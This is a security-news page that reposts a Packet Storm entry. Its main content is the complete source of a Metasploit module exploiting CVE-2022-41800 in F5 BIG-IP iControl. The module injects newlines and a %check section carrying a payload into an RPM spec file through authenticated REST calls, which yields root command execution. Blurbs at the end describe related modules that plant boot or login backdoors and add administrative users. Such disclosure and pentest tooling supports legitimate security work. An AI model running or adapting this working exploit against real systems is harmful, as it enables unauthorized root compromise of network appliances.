Security
Headlines
HeadlinesLatestCVEs

Headline

F5 BIG-IP iControl Remote Command Execution

This Metasploit module exploits a newline injection into an RPM .rpmspec file that permits authenticated users to remotely execute commands. Successful exploitation results in remote code execution as the root user.

Packet Storm
#vulnerability#linux#js#git#rce#auth#rpm#ssl
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'F5 BIG-IP iControl Authenticated RCE via RPM Creator',        'Description' => %q{          This module exploits a newline injection into an RPM .rpmspec file          that permits authenticated users to remotely execute commands.          Successful exploitation results in remote code execution          as the root user.        },        'Author' => [          'Ron Bowes' # Discovery, PoC, and module        ],        'References' => [          ['CVE', '2022-41800'],          ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],          ['URL', 'https://support.f5.com/csp/article/K97843387'],          ['URL', 'https://support.f5.com/csp/article/K13325942'],        ],        'License' => MSF_LICENSE,        'DisclosureDate' => '2022-11-16', # Vendor advisory        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD],        'Privileged' => true,        'Targets' => [          [ 'Default', {} ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 443,          'SSL' => true,          'PrependFork' => true, # Needed to avoid warnings about timeouts and potential failures across attempts.          'MeterpreterTryToFork' => true # Needed to avoid warnings about timeouts and potential failures across attempts.        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION], # One at a time          'SideEffects' => [            IOC_IN_LOGS,            ARTIFACTS_ON_DISK          ]        }      )    )    register_options(      [        OptString.new('HttpUsername', [true, 'iControl username', 'admin']),        OptString.new('HttpPassword', [true, 'iControl password', ''])      ]    )  end  def exploit    # The RPM name is based on these, so we need these to delete the RPM file after    name = rand_text_alphanumeric(5..10)    version = "#{rand_text_numeric(1)}.#{rand_text_numeric(1)}.#{rand_text_numeric(1)}"    release = "#{rand_text_numeric(1)}.#{rand_text_numeric(1)}.#{rand_text_numeric(1)}"    vprint_status('Creating an .rpmspec file on the target...')    result = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/mgmt/shared/iapp/rpm-spec-creator'),      'ctype' => 'application/json',      'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),      'data' => {        'specFileData' => {          'name' => name,          'srcBasePath' => '/tmp',          'version' => version,          'release' => release,          # This is the injection - add newlines then a '%check' section          'description' => "\n\n%check\n#{payload.encoded}\n",          'summary' => rand_text_alphanumeric(5..10)        }      }.to_json    })    fail_with(Failure::Unknown, 'Failed to send HTTP request') unless result    fail_with(Failure::NoAccess, 'Authentication failed') if result.code == 401    fail_with(Failure::UnexpectedReply, "Server returned an unexpected response: HTTP/#{result.code}") if result.code != 200    json = result&.get_json_document    fail_with(Failure::UnexpectedReply, "Server didn't return valid JSON") unless json    file_path = json['specFilePath']    fail_with(Failure::UnexpectedReply, "Server didn't return a specFilePath") unless file_path    vprint_status("Created spec file: #{file_path}")    register_file_for_cleanup(file_path)    # We can also use `exit 1` in the %check function to prevent this file    # from being created, rather than cleaning it up.. but that seems noisier?    # Neither option gets logged so /shrug    register_file_for_cleanup("/var/config/rest/node/tmp/RPMS/noarch/#{name}-#{version}-#{release}.noarch.rpm")    vprint_status('Building the RPM to trigger the payload...')    result = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/mgmt/shared/iapp/build-package'),      'ctype' => 'application/json',      'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),      'data' => {        'state' => {},        'appName' => rand_text_alphanumeric(5..10),        'packageDirectory' => '/tmp',        'specFilePath' => file_path      }.to_json    })    fail_with(Failure::Unknown, 'Failed to send HTTP request') unless result    fail_with(Failure::NoAccess, 'Authentication failed') if result.code == 401    fail_with(Failure::UnexpectedReply, "Server returned an unexpected response: HTTP/#{result.code}") if result.code < 200 || result.code > 299  endend

Related news

F5 Big-IP Create Administrative User

This Metasploit module creates a local user with a username/password and root-level privileges. Note that a root-level account is not required to do this, which makes it a privilege escalation issue. Note that this is pretty noisy, since it creates a user account and creates log files and such. Additionally, most (if not all) vulnerabilities in F5 grant root access anyways.

CVE-2022-41622

In all versions, BIG-IP and BIG-IQ are vulnerable to cross-site request forgery (CSRF) attacks through iControl SOAP. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

CVE-2022-41800

In all versions of BIG-IP, when running in Appliance mode, an authenticated user assigned the Administrator role may be able to bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint. A successful exploit can allow the attacker to cross a security boundary. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

F5 BIG-IP iControl Cross Site Request Forgery

This Metasploit module exploits a cross-site request forgery (CSRF) vulnerability in F5 Big-IP's iControl interface to write an arbitrary file to the filesystem. While any file can be written to any location as root, the exploitability is limited by SELinux; the vast majority of writable locations are unavailable. By default, we write to a script that executes at reboot, which means the payload will execute the next time the server boots. An alternate target - Login - will add a backdoor that executes next time a user logs in interactively. This overwrites a file, but we restore it when we get a session Note that because this is a CSRF vulnerability, it starts a web server, but an authenticated administrator must visit the site, which redirects them to the target.

F5 BIG-IP iControl Cross Site Request Forgery

This Metasploit module exploits a cross-site request forgery (CSRF) vulnerability in F5 Big-IP's iControl interface to write an arbitrary file to the filesystem. While any file can be written to any location as root, the exploitability is limited by SELinux; the vast majority of writable locations are unavailable. By default, we write to a script that executes at reboot, which means the payload will execute the next time the server boots. An alternate target - Login - will add a backdoor that executes next time a user logs in interactively. This overwrites a file, but we restore it when we get a session Note that because this is a CSRF vulnerability, it starts a web server, but an authenticated administrator must visit the site, which redirects them to the target.

High Severity Vulnerabilities Reported in F5 BIG-IP and BIG-IQ Devices

Multiple security vulnerabilities have been disclosed in F5 BIG-IP and BIG-IQ devices that, if successfully exploited, to completely compromise affected systems. Cybersecurity firm Rapid7 said the flaws could be abused to remote access to the devices and defeat security constraints. The two high-severity issues, which were reported to F5 on August 18, 2022, are as follows -

High Severity Vulnerabilities Reported in F5 BIG-IP and BIG-IQ Devices

Multiple security vulnerabilities have been disclosed in F5 BIG-IP and BIG-IQ devices that, if successfully exploited, to completely compromise affected systems. Cybersecurity firm Rapid7 said the flaws could be abused to remote access to the devices and defeat security constraints. The two high-severity issues, which were reported to F5 on August 18, 2022, are as follows -

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution